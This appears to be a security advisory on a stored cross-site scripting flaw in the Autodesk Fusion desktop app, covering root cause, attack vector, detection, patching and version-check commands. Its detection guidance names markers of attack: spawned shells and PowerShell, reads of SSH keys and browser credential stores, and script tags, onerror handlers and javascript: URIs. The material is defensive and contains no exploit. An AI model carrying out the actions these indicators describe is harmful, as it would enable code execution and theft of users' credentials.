CVE-2025-10244 Overview
CVE-2025-10244 is a stored cross-site scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload, when rendered by the application, triggers script execution in the context of the current process. An attacker can leverage this flaw to read local files or execute arbitrary code on the victim's machine. The vulnerability is tracked under [CWE-79] (Improper Neutralization of Input During Web Page Generation) and carries a CVSS 3.1 score of 8.7.
Critical Impact
Successful exploitation allows local file disclosure and arbitrary code execution within the Autodesk Fusion desktop process, compromising user data and system integrity.
Affected Products
- Autodesk Fusion (desktop application for Windows)
- Autodesk Fusion (desktop application for macOS)
- All versions prior to the fix released in Autodesk Security Advisory ADSK-SA-2025-0020
Discovery Timeline
- 2025-09-23 - CVE-2025-10244 published to the National Vulnerability Database (NVD)
- 2025-12-01 - Last updated in NVD database
Technical Details for CVE-2025-10244
Vulnerability Analysis
The Autodesk Fusion desktop application renders HTML content within an embedded web view as part of its user interface and collaboration features. The application fails to properly neutralize HTML and script content before rendering it, which allows attacker-controlled markup to execute as active code. Because the rendering occurs inside the desktop process rather than a sandboxed browser context, the injected script inherits the privileges of the Fusion application itself. This elevates a typical web XSS issue into a local file read and arbitrary code execution primitive on the host operating system.
Root Cause
The root cause is improper output encoding of HTML data that is stored and later rendered by the desktop client. Stored payloads persist across sessions, so any user who opens or previews the affected resource triggers execution. The desktop web view does not enforce a content security policy strong enough to block inline script execution or local resource access.
Attack Vector
The attack vector is network-based and requires user interaction. A low-privileged authenticated actor stores a crafted HTML payload within a shared Fusion resource. When a victim opens or previews that resource in the Fusion desktop application, the payload runs in the application's context. The scope change reflects the ability to break out of the rendering component and affect the underlying operating system, including reading local files and executing code.
No verified public proof-of-concept code is available. See the Autodesk Security Advisory ADSK-SA-2025-0020 for vendor technical details.
Detection Methods for CVE-2025-10244
Indicators of Compromise
- Unexpected child processes spawned by the Autodesk Fusion executable, particularly command shells, powershell.exe, or scripting interpreters
- Outbound network connections from the Fusion process to non-Autodesk infrastructure following the opening of a shared design or document
- Local file read activity by Fusion targeting sensitive directories such as user profile folders, SSH keys, or browser credential stores
Detection Strategies
- Monitor process lineage for Autodesk Fusion (Fusion360.exe, Fusion Client Downloader.exe) launching unexpected interpreters or LOLBins
- Hunt for HTML files within Fusion project storage containing <script> tags, event handlers such as onerror=, or javascript: URIs
- Inspect endpoint telemetry for Fusion-initiated file reads on paths outside its expected working directories
Monitoring Recommendations
- Enable command-line argument logging on Windows endpoints and forward Fusion process events to a centralized SIEM
- Alert on Fusion network egress to domains not associated with Autodesk update or cloud services
- Review collaboration and shared workspace activity for newly uploaded content from low-trust accounts
How to Mitigate CVE-2025-10244
Immediate Actions Required
- Update Autodesk Fusion to the patched version specified in Autodesk Security Advisory ADSK-SA-2025-0020
- Restrict shared workspace and team project access to trusted collaborators only
- Audit existing Fusion projects for suspicious embedded HTML or script content prior to opening
Patch Information
Autodesk has released fixed installers for both Windows and macOS. Download the updated client from the official distribution links referenced in the advisory: Fusion Client Downloader (EXE) and Fusion Client Downloader (DMG). Verify installation by checking the application version against the advisory's listed fixed builds.
Workarounds
- Avoid opening Fusion files or shared projects originating from untrusted users until the patch is applied
- Run Autodesk Fusion under a standard (non-administrator) user account to limit the impact of code execution
- Apply host-based egress filtering to block the Fusion process from reaching arbitrary external endpoints
# Verify installed Autodesk Fusion version on Windows
reg query "HKLM\SOFTWARE\Autodesk\Fusion 360" /v Version
# Verify installed Autodesk Fusion version on macOS
defaults read /Applications/Autodesk\ Fusion.app/Contents/Info.plist CFBundleShortVersionString
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
